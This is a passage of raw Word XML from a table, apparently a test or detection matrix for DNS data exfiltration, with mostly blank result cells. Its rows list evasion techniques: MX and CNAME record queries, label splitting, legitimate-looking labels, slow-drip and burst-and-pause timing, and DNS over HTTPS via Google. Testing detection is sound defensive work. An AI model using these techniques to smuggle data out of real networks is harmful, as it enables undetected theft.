          </w:tcPr>
          <w:p w14:paraId="66A0264B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="28EA018F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="344A9D85" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2D89D79A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1C20F215" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36F3DFE1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="13EBD6E6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="74078216" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>5b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5F1670FD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>MX record queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7AF9826F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="510DC513" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="184E4159" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0D2DA5D6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2B3FC68E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="48B0F7D3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="48202302" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7FEFDCC2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="59A000DB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>5c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A4DC073" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>CNAME record queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="43DCF563" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0EBEA93D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="436F4D92" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FFFADA9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2EB5FB25" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1670909D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="77688629" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0A765AAF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2FF50712" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="661D1C79" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Label splitting (4 levels)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="05DA2D1F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1E01A59A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="403AC648" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="29D5A0FC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="038D9B73" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6A912B38" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5E33F622" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="4F99CBDF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7981A75D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7DFE9909" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Legitimate-looking labels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B41F105" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1BC8254F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="684C0F07" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="48E97CBF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4063993B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47FA5136" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="690A6A38" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0C51F813" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5A2F0892" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5968ABB8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Slow drip (30-120s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1F909427" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="08905BA3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="251829EC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2B0D14EF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2FE8D244" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="11D75273" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0C82ADCB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="017B0384" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3FA6B4A3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="796CB2D8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Burst-and-pause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A15FC4E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="187D35A6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="167FD7B5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4182E949" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="563C67A4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6660DB6A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2CCE4D5F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="2E5CE400" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="674295CC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>10a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0079B1D2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DoH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> via Google</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="57A763C9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4BABED16" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
